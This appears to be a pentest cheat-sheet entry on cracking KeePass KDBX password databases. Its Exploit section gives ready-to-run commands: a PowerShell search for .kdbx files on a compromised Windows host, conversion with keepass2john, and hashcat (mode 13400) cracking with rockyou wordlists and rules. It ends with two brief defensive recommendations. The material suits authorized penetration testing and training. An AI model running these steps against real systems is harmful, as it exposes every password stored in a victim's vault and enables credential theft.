KDBX
Table of contents
Vulnerability
KDBX format is the second version (KDB in version 1) for an encrypted database that contains passwords. This database is generally encrypted with a master key. If you gain access to a computer, try to find .kdb[x] file on the system. Then, transfer it to your Kali and convert it with keepass2john to then crack the master key with hashcat. If you manage to crack it, you’ll gain access to all passwords stored in the database.
Prerequisites
- KDBX file can be exported on your Kali.
Exploit
# Locate .kdbx files on a Windows system.
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
# Transfer the .kdbx file on your Kali and convert it.
keepass2john Database.kdbx > keepass.hash
# Crack it with hashcat (13400 corresponds to KDBX database format).
hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force
Recommendations
- Enforce strong master key on KDBX file.
- Use passwordless authentication method to secure KDBX file like FIDO 2 key.